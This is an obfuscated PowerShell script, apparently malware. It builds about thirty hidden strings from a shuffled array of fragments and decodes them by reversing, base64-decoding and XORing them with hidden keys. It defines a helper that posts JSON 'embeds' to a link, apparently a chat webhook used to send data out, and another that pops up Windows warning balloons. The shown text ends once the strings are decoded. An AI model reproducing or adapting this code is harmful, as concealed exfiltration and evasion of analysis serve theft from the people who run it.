$ErrorActionPreference = "Continue"
Add-Type -AssemblyName System.Windows.Forms
function qKdRktBcgZJt($title, $text, $duration) {
try {
$balloon = New-Object System.Windows.Forms.NotifyIcon
$balloon.Icon = [System.Drawing.SystemIcons]::Warning
$balloon.BalloonTipTitle = $title
$balloon.BalloonTipText = $text
$balloon.Visible = $true
$balloon.ShowBalloonTip($duration * 1000)
Start-Sleep -Seconds $duration
$balloon.Dispose()
} catch { }
}
function IRKjsmBcEfqQ($link, $title, $color, $fields) {
try {
$embedBody = @{
embeds = @(
@{
title = $title
color = $color
fields = $fields
}
)
} | ConvertTo-Json -Depth 10
Invoke-RestMethod -Uri $link -Method Post -ContentType "application/json" -Body $embedBody -ErrorAction Stop | Out-Null
} catch { }
}
function xYEfLAHsaMBd($reversed, $key) {
try {
$charArr = $reversed.ToCharArray()
[array]::Reverse($charArr)
$unreversed = -join $charArr
$decoded = [System.Convert]::FromBase64String($unreversed)
$keyBytes = [System.Text.Encoding]::UTF8.GetBytes($key)
$result = New-Object byte[] $decoded.Length
for ($i = 0; $i -lt $decoded.Length; $i++) {
$result[$i] = $decoded[$i] -bxor $keyBytes[$i % $keyBytes.Length]
}
return [System.Text.Encoding]::UTF8.GetString($result)
} catch {
return $reversed
}
}
$UFWPQCoizQlt = @("AUlX", "ae15", "EcRZ", "babf", "29FX", "CwQD", "06f3", "f482", "efde", "2ad1", "=kFW", "QAUF", "PgnS", "b128", "Axgb", "5a14", "0176", "0fb8", "7b1e", "RJBV", "IJhF", "2d7f", "a9e1", "bNlf", "f682", "8690", "WJBG", "UBgB", "3079", "a2ae", "ABjG", "WExN", "XZwX", "BZxF", "HU1C", "640d", "HoUV", "GNVN", "e825", "a73c", "33c5", "MVQD", "955e", "febc", "FdBQ", "ARVJ", "vhhB", "7JFX", "caa3", "1483", "==AA", "H4AE", "fJkU", "bf16", "6dBV", "2dc7", "FNRQ", "bZgV", "d803", "8e3b", "9gQc", "5f8b", "=IES", "AQgV", "e8ba", "d65f", "7e08", "ae7b", "7592", "7536", "813d", "W8lW", "6b87", "9QmB", "d5e6", "fFEF", "d6e8", "F5gf", "QdQE", "baaf", "ff3e", "8779", "l1FD", "751c", "a685", "36df", "d1a7", "FwAA", "MMkC", "9b70", "phVU", "8eca", "bbe9", "8acb", "xtXC", "CNBS", "exEE", "yokV", "GIQF", "DoAE", "5327", "e5a4", "e8b9", "f875", "GRgU", "c49b", "7045", "MwAD", "rdlW", "71c8", "atwX", "YlUW", "f778", "8ba3", "QdhX", "pRGV", "a1b9", "631d", "826a", "5kgC", "AMgR", "1148", "KhgF", "QxVc", "af9d", "50jR", "F9lU", "fdVD", "5b52", "ZBAH", "cff6", "bd89", "0bcf", "77a1", "2c79", "cxgY", "e39e", "16a6", "9ab4", "28ea", "7ec8", "7e0c", "1b57", "NF0X", "aF1Q", "MIUA", "d7f9", "ac42", "UhhG", "W1AN", "klFc", "0f13", "b56a", "e173", "8526", "5044", "WBgV", "bfd5", "dd33", "fJFX", "ThlU", "NRUW", "MdFF", "1dda", "CcQF", "ft1Z", "NIRE", "89b3", "7e88", "e702", "WtxU", "==AE", "sYjK", "9a0d", "0VhS", "d816", "OUlU", "f80d", "57d3", "38ad", "510f", "5d7e", "3e4f", "74ec", "9f7e", "==QU", "3be1", "aIRX", "ItTC", "UFVR", "YsxB", "TtEF", "==AU", "==wc", "cfad", "b40b", "e737", "2f35", "ZVFX", "BpkS", "ac60", "d587", "Sgha", "8eb3", "4973", "fFQF", "35ac", "ZUxS", "1eeb", "73d8", "dd8a", "QZhQ", "OhQQ", "a25b", "0231", "UdkX", "4675", "3a91", "==AT", "XUxA", "850a", "05ab", "0a0e", "Ah1X", "RVxR", "ERUH", "4597", "RQ3X", "d533", "8033", "8467", "0d8c", "e0bc", "X4FQ", "NpAX", "HIED", "a570", "==AG", "CpVB", "ddec", "0f49", "6809", "d21f", "96da", "d259", "b575", "VV0C", "99c2", "6b35", "3YBX", "71c0", "VpEA", "2464", "0983", "EQke", "AYhF", "HV0A", "S4FB", "QIEX", "7syB", "dZhV", "a137", "9eb8", "8cd3", "a488", "4eed", "e398", "27f3", "a7ee", "e776", "RUUW", "91ce", "WdQA", "BZxQ", "25fc", "cbef", "175a", "e993", "e9FX", "6001", "Wogb", "7c55", "RpUW", "de3e", "ba54", "22ae", "3100", "XMgL", "4957", "GUwW", "e118", "NgAA", "PBwF", "1411", "0d9e", "ffc4", "0431", "JpVU", "acxA", "SpVQ", "aZBA", "087e", "==QA", "=cVS", "Z1XM", "53c8", "PdAZ", "eJwW", "clFW", "W93R", "BJFE", "TF1U", "5BBR", "bbb5", "3957", "tM0c", "M0VV", "1bac", "bVlW", "4f5c", "73fc", "2866", "PhUQ", "1176", "HRlQ", "69d9", "aaad", "BRFH", "0865", "U5VR", "77f5", "fc6b", "75e2", "JNEJ", "8d44", "5f8c", "hQVV", "14aa", "b22c", "a220", "UJVf", "6ca9", "D8lC", "bRgW", "MNwX", "NFhX", "0f07", "T5RV", "CoAB", "PA1A", "olGE", "9772", "J1QQ", "87ec", "f360", "GJAC", "487c", "503e", "Td1V", "YVUQ", "lJRQ", "ce74", "BAEI", "8909", "KIlR", "c0e2", "e6b0", "DQxX", "WNRT", "ecc2", "WdlW", "97a7", "RkxB", "bec2", "EEBW", "5698", "3a74", "B1FV", "JwXf", "Zo0D", "=oER", "edb5", "XNEG", "fNlV", "8281", "8RRF", "01d9", "229c", "7dc9", "Alld", "c4ca", "YkUQ", "ehFb", "8235", "3371", "08b8", "+AlU", "dc19", "6d7b", "27c1", "31b1", "TVxU", "WZUM", "334b", "575d", "aace", "10d5", "e1wd", "Pg1C", "==QQ", "HMVT", "VtlU", "XpEZ", "e969", "TA0A", "ChkF", "5683", "a25a", "vxxD", "655b", "RNXZ", "5367", "64d6", "cBEE", "SwgW", "c28c", "GwAZ", "3c12", "dl0N", "cccd", "a52d", "XUlV", "a1b7", "KQ1R", "612d", "LdEB", "==gB", "0222", "NhwA", "jABV", "eV1X", "HBBD", "YYVW", "b477", "a513", "3727", "==gZ", "4e3a", "bZRZ", "JswJ", "KwQF", "x4VF", "b562", "2a30", "cb2f", "Uw0U", "==gE", "chFU", "2db7", "7063", "zYUZ", "6ce9", "850d", "WcBX", "1991", "5065", "RxkH", "YFlQ", "GZUV", "fefc", "U51Q", "Sw1X", "VZBU", "fxwY", "H8VC", "f69a", "VFgX", "yMVd", "d1FB", "77d2", "1c3a", "BZXA", "==QR", "DUwd", "bae7", "a580", "0132", "UAlU", "2897", "3ca0", "BdlC", "e8a2", "e0b3", "YVlW", "PZRB", "0cc1", "f442", "44a7", "66d7", "WdRY", "WQwN", "BNhU", "3544", "ccb1", "e6c0", "59d4", "==wQ", "d418", "LtUV", "3c8a", "35ad", "6491", "fcbf", "b1f5", "BkFF", "MwFD", "QdwS", "aec2", "jJEC", "bd8d", "RMDG", "b11V", "7a57", "680b", "FNUc", "5438", "4cba", "dbce", "AREU", "c4f2", "dpAe", "b7d7", "0b73", "VN0F", "d63f", "SlFY", "4d44", "80fb", "VplW", "b00b", "YVAS", "X5le", "822b", "XIlJ", "bYxA", "3e90", "=cxF", "b1e1", "623d", "ee26", "==QW", "1dae", "BVTP", "VchX", "0056", "ac4b", "069e", "1092", "ef2e", "8MlC", "367a", "b2dc", "9796", "2fb4", "uNAB", "DBFG", "EJgV", "TJUE", "dFlT", "=QkF", "KZ1C", "V0VA", "6620", "7651", "636d", "0219", "ced1", "83e8", "1f88", "bRkQ", "FFgQ", "CU0C", "8729", "UsgQ", "TxgD", "dZBX", "7a66", "=k2G", "7e71", "9bac", "1191", "==AV", "2b1f", "9025", "73cf", "132e", "HcQE", "93e4", "Vxlc", "7840", "LsBE", "dae1", "dJBQ", "9115", "HYVK", "SAEA", "40e8", "4a59", "VoAe", "m5lW", "52d4", "abe0", "d445", "d827", "VlVC", "ZdiS", "SdUD", "0627", "Vt0M", "fREU", "L5Va", "b7f5", "0c1a", "281c", "0ecc", "KVhU", "agVQ", "CskB", "3ba5", "3953", "e9d4", "B8wD", "HxFW", "AN1N", "f64e", "fxVQ", "HQ1F", "WdVV", "TIWO", "3675", "3c81", "2559", "fdf9", "5486", "4208", "==AB", "fFEV", "VVFR", "e57e", "dhAF", "c4e6", "0d78", "RklC", "a13b", "Zw0S", "d87b", "86c3", "285e", "==AR", "V5xU", "E41T", "VUhR", "FNkV", "N4CZ", "f2b1", "LZ0F", "d3ba", "cbd2", "3be9", "cb01", "b240", "rBBc", "CEUS", "7ac1", "8c91", "NwAD", "cd87", "=oEA", "alVQ", "a61a", "dc00", "AQAA", "RsVU", "15d6", "5794", "f2d1", "c64f", "944c", "da97", "F8FC", "9EkU", "6e9a", "d181", "4e1a", "N5FF", "18e5", "HRkV", "Z1AF", "101d", "5fc8", "WB1E", "fhlM", "e096", "9f88", "ItEK", "87fb", "04f7", "e342", "9498", "99f3", "b453", "OlAC", "FwVZ", "351f", "5bac", "31e8", "BZlR", "fa6b", "4b52", "wgWc", "GYhU", "fb5e", "AQUa", "4232", "0161", "LIhX", "RERc", "e116", "0313", "fa91", "==gQ", "EdEX", "YhFX", "QgFF", "VRET", "28dd", "32f2", "52f8")
$nXiZflAJTwOf = -join @($UFWPQCoizQlt[380], $UFWPQCoizQlt[660], $UFWPQCoizQlt[649], $UFWPQCoizQlt[540], $UFWPQCoizQlt[148], $UFWPQCoizQlt[579], $UFWPQCoizQlt[161])
$pDvtaWKoFTHm = -join @($UFWPQCoizQlt[557], $UFWPQCoizQlt[522], $UFWPQCoizQlt[406], $UFWPQCoizQlt[210], $UFWPQCoizQlt[222], $UFWPQCoizQlt[67], $UFWPQCoizQlt[154], $UFWPQCoizQlt[17])
$YmnSMILmEwMi = xYEfLAHsaMBd $nXiZflAJTwOf $pDvtaWKoFTHm
$EvjSBXaUbork = -join @($UFWPQCoizQlt[446], $UFWPQCoizQlt[94], $UFWPQCoizQlt[671], $UFWPQCoizQlt[494], $UFWPQCoizQlt[304], $UFWPQCoizQlt[30], $UFWPQCoizQlt[159], $UFWPQCoizQlt[23], $UFWPQCoizQlt[259], $UFWPQCoizQlt[188], $UFWPQCoizQlt[272], $UFWPQCoizQlt[4], $UFWPQCoizQlt[47], $UFWPQCoizQlt[315], $UFWPQCoizQlt[120], $UFWPQCoizQlt[374], $UFWPQCoizQlt[460], $UFWPQCoizQlt[119], $UFWPQCoizQlt[428], $UFWPQCoizQlt[477], $UFWPQCoizQlt[420], $UFWPQCoizQlt[143], $UFWPQCoizQlt[732], $UFWPQCoizQlt[472], $UFWPQCoizQlt[63], $UFWPQCoizQlt[681], $UFWPQCoizQlt[156], $UFWPQCoizQlt[289], $UFWPQCoizQlt[348], $UFWPQCoizQlt[176], $UFWPQCoizQlt[379], $UFWPQCoizQlt[278], $UFWPQCoizQlt[189], $UFWPQCoizQlt[626], $UFWPQCoizQlt[111], $UFWPQCoizQlt[129], $UFWPQCoizQlt[616], $UFWPQCoizQlt[114], $UFWPQCoizQlt[466], $UFWPQCoizQlt[672], $UFWPQCoizQlt[553])
$CMynQZpWsLZn = -join @($UFWPQCoizQlt[341], $UFWPQCoizQlt[623], $UFWPQCoizQlt[178], $UFWPQCoizQlt[452], $UFWPQCoizQlt[686], $UFWPQCoizQlt[603], $UFWPQCoizQlt[252], $UFWPQCoizQlt[386])
$xaKPlBlGRftx = xYEfLAHsaMBd $EvjSBXaUbork $CMynQZpWsLZn
$gImAQgxRYRLc = -join @($UFWPQCoizQlt[456], $UFWPQCoizQlt[223], $UFWPQCoizQlt[57], $UFWPQCoizQlt[615], $UFWPQCoizQlt[291], $UFWPQCoizQlt[300], $UFWPQCoizQlt[435], $UFWPQCoizQlt[257], $UFWPQCoizQlt[451], $UFWPQCoizQlt[12], $UFWPQCoizQlt[521], $UFWPQCoizQlt[187], $UFWPQCoizQlt[215], $UFWPQCoizQlt[433], $UFWPQCoizQlt[255], $UFWPQCoizQlt[367], $UFWPQCoizQlt[438], $UFWPQCoizQlt[544], $UFWPQCoizQlt[199], $UFWPQCoizQlt[166], $UFWPQCoizQlt[345])
$EYiMByTYftTZ = -join @($UFWPQCoizQlt[691], $UFWPQCoizQlt[268], $UFWPQCoizQlt[628], $UFWPQCoizQlt[688], $UFWPQCoizQlt[405], $UFWPQCoizQlt[648], $UFWPQCoizQlt[728], $UFWPQCoizQlt[496])
$jKEAXejQslPz = xYEfLAHsaMBd $gImAQgxRYRLc $EYiMByTYftTZ
$JfyqhhnksKnT = -join @($UFWPQCoizQlt[587], $UFWPQCoizQlt[581], $UFWPQCoizQlt[282], $UFWPQCoizQlt[385], $UFWPQCoizQlt[625], $UFWPQCoizQlt[697], $UFWPQCoizQlt[144], $UFWPQCoizQlt[391], $UFWPQCoizQlt[297], $UFWPQCoizQlt[246], $UFWPQCoizQlt[75], $UFWPQCoizQlt[190], $UFWPQCoizQlt[580], $UFWPQCoizQlt[26], $UFWPQCoizQlt[298], $UFWPQCoizQlt[716], $UFWPQCoizQlt[722])
$xiOKxkqMxRJA = -join @($UFWPQCoizQlt[563], $UFWPQCoizQlt[330], $UFWPQCoizQlt[241], $UFWPQCoizQlt[21], $UFWPQCoizQlt[687], $UFWPQCoizQlt[89], $UFWPQCoizQlt[83], $UFWPQCoizQlt[491])
$flPcoEboIdtV = xYEfLAHsaMBd $JfyqhhnksKnT $xiOKxkqMxRJA
$yyJIExBZLIcj = -join @($UFWPQCoizQlt[482], $UFWPQCoizQlt[107], $UFWPQCoizQlt[256], $UFWPQCoizQlt[95], $UFWPQCoizQlt[122], $UFWPQCoizQlt[662], $UFWPQCoizQlt[533], $UFWPQCoizQlt[211], $UFWPQCoizQlt[414], $UFWPQCoizQlt[359], $UFWPQCoizQlt[402])
$KGojfwPNefYg = -join @($UFWPQCoizQlt[228], $UFWPQCoizQlt[492], $UFWPQCoizQlt[400], $UFWPQCoizQlt[169], $UFWPQCoizQlt[390], $UFWPQCoizQlt[214], $UFWPQCoizQlt[634], $UFWPQCoizQlt[667])
$mtjqNjggsZye = xYEfLAHsaMBd $yyJIExBZLIcj $KGojfwPNefYg
$siyAxqmgGHeM = -join @($UFWPQCoizQlt[636], $UFWPQCoizQlt[370], $UFWPQCoizQlt[382], $UFWPQCoizQlt[198], $UFWPQCoizQlt[270], $UFWPQCoizQlt[20], $UFWPQCoizQlt[618])
$QZOQQVeSWrVA = -join @($UFWPQCoizQlt[177], $UFWPQCoizQlt[321], $UFWPQCoizQlt[245], $UFWPQCoizQlt[147], $UFWPQCoizQlt[399], $UFWPQCoizQlt[529], $UFWPQCoizQlt[593], $UFWPQCoizQlt[217])
$YRQPvydhTNGI = xYEfLAHsaMBd $siyAxqmgGHeM $QZOQQVeSWrVA
$NwdJpuqUAzfd = -join @($UFWPQCoizQlt[436], $UFWPQCoizQlt[631], $UFWPQCoizQlt[364], $UFWPQCoizQlt[219], $UFWPQCoizQlt[299], $UFWPQCoizQlt[56], $UFWPQCoizQlt[234], $UFWPQCoizQlt[700], $UFWPQCoizQlt[31])
$qOwWDmenwSvz = -join @($UFWPQCoizQlt[239], $UFWPQCoizQlt[42], $UFWPQCoizQlt[393], $UFWPQCoizQlt[713], $UFWPQCoizQlt[642], $UFWPQCoizQlt[429], $UFWPQCoizQlt[561], $UFWPQCoizQlt[371])
$biXqZcyfvfxs = xYEfLAHsaMBd $NwdJpuqUAzfd $qOwWDmenwSvz
$GKDhOguRkAjz = -join @($UFWPQCoizQlt[478], $UFWPQCoizQlt[312], $UFWPQCoizQlt[585], $UFWPQCoizQlt[543])
$kkmGOZBHwDNz = -join @($UFWPQCoizQlt[531], $UFWPQCoizQlt[670], $UFWPQCoizQlt[66], $UFWPQCoizQlt[511], $UFWPQCoizQlt[229], $UFWPQCoizQlt[109], $UFWPQCoizQlt[180], $UFWPQCoizQlt[547])
$XFjhUrcDpDpr = xYEfLAHsaMBd $GKDhOguRkAjz $kkmGOZBHwDNz
$XFLBqthnByOh = -join @($UFWPQCoizQlt[193], $UFWPQCoizQlt[172])
$eqeCeKzhIqvc = -join @($UFWPQCoizQlt[484], $UFWPQCoizQlt[61], $UFWPQCoizQlt[729], $UFWPQCoizQlt[146], $UFWPQCoizQlt[395], $UFWPQCoizQlt[454], $UFWPQCoizQlt[163], $UFWPQCoizQlt[253])
$jepFzxJxznWp = xYEfLAHsaMBd $XFLBqthnByOh $eqeCeKzhIqvc
$BVVwEnMdxyek = -join @($UFWPQCoizQlt[675], $UFWPQCoizQlt[731], $UFWPQCoizQlt[360], $UFWPQCoizQlt[126], $UFWPQCoizQlt[701])
$MVLQstmsPezy = -join @($UFWPQCoizQlt[727], $UFWPQCoizQlt[437], $UFWPQCoizQlt[314], $UFWPQCoizQlt[369], $UFWPQCoizQlt[519], $UFWPQCoizQlt[403], $UFWPQCoizQlt[290], $UFWPQCoizQlt[706])
$oWpbPOZlnPWp = xYEfLAHsaMBd $BVVwEnMdxyek $MVLQstmsPezy
$NIObYQUCyHBq = -join @($UFWPQCoizQlt[719])
$GhhbpMwzjEIf = -join @($UFWPQCoizQlt[139], $UFWPQCoizQlt[28], $UFWPQCoizQlt[504], $UFWPQCoizQlt[640], $UFWPQCoizQlt[288], $UFWPQCoizQlt[232], $UFWPQCoizQlt[562], $UFWPQCoizQlt[485])
$fRppcdwYJDUu = xYEfLAHsaMBd $NIObYQUCyHBq $GhhbpMwzjEIf
$KjCIfsIswNHj = -join @($UFWPQCoizQlt[515], $UFWPQCoizQlt[508], $UFWPQCoizQlt[46], $UFWPQCoizQlt[123])
$hueNHYLIygLF = -join @($UFWPQCoizQlt[356], $UFWPQCoizQlt[363], $UFWPQCoizQlt[59], $UFWPQCoizQlt[130], $UFWPQCoizQlt[3], $UFWPQCoizQlt[206], $UFWPQCoizQlt[558], $UFWPQCoizQlt[133])
$AHsmYguiOXUS = xYEfLAHsaMBd $KjCIfsIswNHj $hueNHYLIygLF
$fsUHUFlvkYSP = -join @($UFWPQCoizQlt[658], $UFWPQCoizQlt[310], $UFWPQCoizQlt[249], $UFWPQCoizQlt[450], $UFWPQCoizQlt[633])
$DXIMOccBegUh = -join @($UFWPQCoizQlt[534], $UFWPQCoizQlt[549], $UFWPQCoizQlt[158], $UFWPQCoizQlt[651], $UFWPQCoizQlt[337], $UFWPQCoizQlt[332], $UFWPQCoizQlt[112], $UFWPQCoizQlt[488])
$eLbvZmhSEknC = xYEfLAHsaMBd $fsUHUFlvkYSP $DXIMOccBegUh
$TaFXUtWxVDZR = -join @($UFWPQCoizQlt[62], $UFWPQCoizQlt[439], $UFWPQCoizQlt[88], $UFWPQCoizQlt[104], $UFWPQCoizQlt[389])
$PCNhViowZXMK = -join @($UFWPQCoizQlt[617], $UFWPQCoizQlt[650], $UFWPQCoizQlt[539], $UFWPQCoizQlt[542], $UFWPQCoizQlt[723], $UFWPQCoizQlt[683], $UFWPQCoizQlt[201], $UFWPQCoizQlt[142])
$UFUnJwIQDmZH = xYEfLAHsaMBd $TaFXUtWxVDZR $PCNhViowZXMK
$YuAMngxgzZDp = -join @($UFWPQCoizQlt[569], $UFWPQCoizQlt[32], $UFWPQCoizQlt[520], $UFWPQCoizQlt[0], $UFWPQCoizQlt[530])
$LsPltRjhBlnD = -join @($UFWPQCoizQlt[427], $UFWPQCoizQlt[231], $UFWPQCoizQlt[365], $UFWPQCoizQlt[196], $UFWPQCoizQlt[128], $UFWPQCoizQlt[216], $UFWPQCoizQlt[606], $UFWPQCoizQlt[244])
$wbVpfPCguvXV = xYEfLAHsaMBd $YuAMngxgzZDp $LsPltRjhBlnD
$gVVMpuJvvxol = -join @($UFWPQCoizQlt[302], $UFWPQCoizQlt[392])
$YzVsIXWDwmLB = -join @($UFWPQCoizQlt[70], $UFWPQCoizQlt[664], $UFWPQCoizQlt[317], $UFWPQCoizQlt[266], $UFWPQCoizQlt[351], $UFWPQCoizQlt[622], $UFWPQCoizQlt[39], $UFWPQCoizQlt[721])
$YGjPlBeWSfGx = xYEfLAHsaMBd $gVVMpuJvvxol $YzVsIXWDwmLB
$aqQwMuyQdKYc = -join @($UFWPQCoizQlt[50], $UFWPQCoizQlt[160], $UFWPQCoizQlt[541])
$pSILICRGKuNu = -join @($UFWPQCoizQlt[384], $UFWPQCoizQlt[85], $UFWPQCoizQlt[443], $UFWPQCoizQlt[184], $UFWPQCoizQlt[208], $UFWPQCoizQlt[425], $UFWPQCoizQlt[497], $UFWPQCoizQlt[406])
$yqEreLnfxUxG = xYEfLAHsaMBd $aqQwMuyQdKYc $pSILICRGKuNu
$XJxdvCqQCKNW = -join @($UFWPQCoizQlt[658], $UFWPQCoizQlt[694], $UFWPQCoizQlt[528], $UFWPQCoizQlt[96], $UFWPQCoizQlt[678], $UFWPQCoizQlt[401], $UFWPQCoizQlt[602], $UFWPQCoizQlt[440], $UFWPQCoizQlt[343], $UFWPQCoizQlt[720], $UFWPQCoizQlt[565], $UFWPQCoizQlt[280])
$tOjoRMEYfmKk = -join @($UFWPQCoizQlt[140], $UFWPQCoizQlt[323], $UFWPQCoizQlt[76], $UFWPQCoizQlt[204], $UFWPQCoizQlt[103], $UFWPQCoizQlt[421], $UFWPQCoizQlt[328], $UFWPQCoizQlt[86])
$PolXUFvsCFRJ = xYEfLAHsaMBd $XJxdvCqQCKNW $tOjoRMEYfmKk
$cPgRNtSwRRGR = -join @($UFWPQCoizQlt[78], $UFWPQCoizQlt[5], $UFWPQCoizQlt[251], $UFWPQCoizQlt[518], $UFWPQCoizQlt[467], $UFWPQCoizQlt[500])
$DSmGOHnhbZqW = -join @($UFWPQCoizQlt[601], $UFWPQCoizQlt[705], $UFWPQCoizQlt[168], $UFWPQCoizQlt[527], $UFWPQCoizQlt[710], $UFWPQCoizQlt[283], $UFWPQCoizQlt[707], $UFWPQCoizQlt[444])
$CSzXEAfZSOlE = xYEfLAHsaMBd $cPgRNtSwRRGR $DSmGOHnhbZqW
$fRrReqngLnGG = -join @($UFWPQCoizQlt[237], $UFWPQCoizQlt[127], $UFWPQCoizQlt[605], $UFWPQCoizQlt[441], $UFWPQCoizQlt[627], $UFWPQCoizQlt[355], $UFWPQCoizQlt[493], $UFWPQCoizQlt[174], $UFWPQCoizQlt[164], $UFWPQCoizQlt[410], $UFWPQCoizQlt[98], $UFWPQCoizQlt[308], $UFWPQCoizQlt[41], $UFWPQCoizQlt[135])
$SpTfYrrWHHeD = -join @($UFWPQCoizQlt[447], $UFWPQCoizQlt[175], $UFWPQCoizQlt[274], $UFWPQCoizQlt[243], $UFWPQCoizQlt[157], $UFWPQCoizQlt[293], $UFWPQCoizQlt[469], $UFWPQCoizQlt[489])
$MwJDVRwxKTUC = xYEfLAHsaMBd $fRrReqngLnGG $SpTfYrrWHHeD
$FRXAtNOWVKGN = -join @($UFWPQCoizQlt[658], $UFWPQCoizQlt[408], $UFWPQCoizQlt[258], $UFWPQCoizQlt[362])
$QzAJOXZKvNJd = -join @($UFWPQCoizQlt[102], $UFWPQCoizQlt[458], $UFWPQCoizQlt[517], $UFWPQCoizQlt[513], $UFWPQCoizQlt[717], $UFWPQCoizQlt[394], $UFWPQCoizQlt[236], $UFWPQCoizQlt[262])
$PLVtehsIpqHu = xYEfLAHsaMBd $FRXAtNOWVKGN $QzAJOXZKvNJd
$WoopXefhmyVY = -join @($UFWPQCoizQlt[10], $UFWPQCoizQlt[224], $UFWPQCoizQlt[646], $UFWPQCoizQlt[45])
$KSEjQSYKFqMz = -join @($UFWPQCoizQlt[261], $UFWPQCoizQlt[560], $UFWPQCoizQlt[81], $UFWPQCoizQlt[595], $UFWPQCoizQlt[702], $UFWPQCoizQlt[613], $UFWPQCoizQlt[38], $UFWPQCoizQlt[203])
$JyAdHuIwpJVS = xYEfLAHsaMBd $WoopXefhmyVY $KSEjQSYKFqMz
$sXeVIkeKBfkC = -join @($UFWPQCoizQlt[192], $UFWPQCoizQlt[514], $UFWPQCoizQlt[609], $UFWPQCoizQlt[499])
$kTAOSJCllmpv = -join @($UFWPQCoizQlt[134], $UFWPQCoizQlt[737], $UFWPQCoizQlt[152], $UFWPQCoizQlt[495], $UFWPQCoizQlt[346], $UFWPQCoizQlt[113], $UFWPQCoizQlt[735], $UFWPQCoizQlt[141])
$epJLoWcCHDJA = xYEfLAHsaMBd $sXeVIkeKBfkC $kTAOSJCllmpv
$OqYnGkGBejwx = -join @($UFWPQCoizQlt[645], $UFWPQCoizQlt[292], $UFWPQCoizQlt[358], $UFWPQCoizQlt[36])
$PQBFJikjusDc = -join @($UFWPQCoizQlt[167], $UFWPQCoizQlt[556], $UFWPQCoizQlt[673], $UFWPQCoizQlt[186], $UFWPQCoizQlt[698], $UFWPQCoizQlt[537], $UFWPQCoizQlt[64], $UFWPQCoizQlt[29])
$TkTMePdGDTVk = xYEfLAHsaMBd $OqYnGkGBejwx $PQBFJikjusDc
$IxrxMHNBJvGR = -join @($UFWPQCoizQlt[170], $UFWPQCoizQlt[463], $UFWPQCoizQlt[71], $UFWPQCoizQlt[455])
$ETUuxoWrVyAw = -join @($UFWPQCoizQlt[422], $UFWPQCoizQlt[294], $UFWPQCoizQlt[656], $UFWPQCoizQlt[53], $UFWPQCoizQlt[338], $UFWPQCoizQlt[248], $UFWPQCoizQlt[479], $UFWPQCoizQlt[13])
$rnyyTIYIxzvI = xYEfLAHsaMBd $IxrxMHNBJvGR $ETUuxoWrVyAw
$dFZDYhVcETyE = -join @($UFWPQCoizQlt[423], $UFWPQCoizQlt[654], $UFWPQCoizQlt[487], $UFWPQCoizQlt[711], $UFWPQCoizQlt[661], $UFWPQCoizQlt[383], $UFWPQCoizQlt[324], $UFWPQCoizQlt[647], $UFWPQCoizQlt[411], $UFWPQCoizQlt[415], $UFWPQCoizQlt[212], $UFWPQCoizQlt[110], $UFWPQCoizQlt[571], $UFWPQCoizQlt[568], $UFWPQCoizQlt[665], $UFWPQCoizQlt[344], $UFWPQCoizQlt[442], $UFWPQCoizQlt[632], $UFWPQCoizQlt[327], $UFWPQCoizQlt[352], $UFWPQCoizQlt[33], $UFWPQCoizQlt[725], $UFWPQCoizQlt[682], $UFWPQCoizQlt[191])
$fcDnRIzhqbIA = -join @($UFWPQCoizQlt[703], $UFWPQCoizQlt[718], $UFWPQCoizQlt[503], $UFWPQCoizQlt[267], $UFWPQCoizQlt[464], $UFWPQCoizQlt[69], $UFWPQCoizQlt[578], $UFWPQCoizQlt[295])
$QKoEkPTajPQX = xYEfLAHsaMBd $dFZDYhVcETyE $fcDnRIzhqbIA
$PjhPRuZLbmTH = -join @($UFWPQCoizQlt[162], $UFWPQCoizQlt[51], $UFWPQCoizQlt[90], $UFWPQCoizQlt[225], $UFWPQCoizQlt[97], $UFWPQCoizQlt[273], $UFWPQCoizQlt[407], $UFWPQCoizQlt[559], $UFWPQCoizQlt[165])
$RZwrfwAKWxPl = -join @($UFWPQCoizQlt[575], $UFWPQCoizQlt[555], $UFWPQCoizQlt[40], $UFWPQCoizQlt[179], $UFWPQCoizQlt[106], $UFWPQCoizQlt[589], $UFWPQCoizQlt[264], $UFWPQCoizQlt[1])
$eZhPcWQnfvDh = xYEfLAHsaMBd $PjhPRuZLbmTH $RZwrfwAKWxPl
$HEbCMLOosYhr = -join @($UFWPQCoizQlt[205], $UFWPQCoizQlt[202], $UFWPQCoizQlt[689], $UFWPQCoizQlt[733], $UFWPQCoizQlt[254], $UFWPQCoizQlt[396], $UFWPQCoizQlt[473])
$nXcJCNCHftYl = -join @($UFWPQCoizQlt[693], $UFWPQCoizQlt[284], $UFWPQCoizQlt[124], $UFWPQCoizQlt[116], $UFWPQCoizQlt[326], $UFWPQCoizQlt[641], $UFWPQCoizQlt[84], $UFWPQCoizQlt[592])
$gAxOiuCKnaMQ = xYEfLAHsaMBd $HEbCMLOosYhr $nXcJCNCHftYl
$RKhuqgcDgiRQ = -join @($UFWPQCoizQlt[233], $UFWPQCoizQlt[431], $UFWPQCoizQlt[412], $UFWPQCoizQlt[564], $UFWPQCoizQlt[149])
$nhfDrSmJpsgF = -join @($UFWPQCoizQlt[676], $UFWPQCoizQlt[121], $UFWPQCoizQlt[462], $UFWPQCoizQlt[715], $UFWPQCoizQlt[480], $UFWPQCoizQlt[680], $UFWPQCoizQlt[413], $UFWPQCoizQlt[576])
$zoRhJAwmBwXk = xYEfLAHsaMBd $RKhuqgcDgiRQ $nhfDrSmJpsgF
$UxOtWbplIwJW = -join @($UFWPQCoizQlt[303], $UFWPQCoizQlt[659], $UFWPQCoizQlt[27], $UFWPQCoizQlt[620], $UFWPQCoizQlt[82], $UFWPQCoizQlt[19], $UFWPQCoizQlt[584], $UFWPQCoizQlt[726], $UFWPQCoizQlt[115], $UFWPQCoizQlt[483], $UFWPQCoizQlt[125], $UFWPQCoizQlt[470], $UFWPQCoizQlt[619], $UFWPQCoizQlt[663], $UFWPQCoizQlt[418], $UFWPQCoizQlt[600], $UFWPQCoizQlt[468], $UFWPQCoizQlt[449], $UFWPQCoizQlt[377], $UFWPQCoizQlt[570], $UFWPQCoizQlt[638], $UFWPQCoizQlt[60])
$MeYqupTOQrGF = -join @($UFWPQCoizQlt[285], $UFWPQCoizQlt[9], $UFWPQCoizQlt[220], $UFWPQCoizQlt[611], $UFWPQCoizQlt[335], $UFWPQCoizQlt[629], $UFWPQCoizQlt[263], $UFWPQCoizQlt[279])
$JnnHpBvrDZbL = xYEfLAHsaMBd $UxOtWbplIwJW $MeYqupTOQrGF
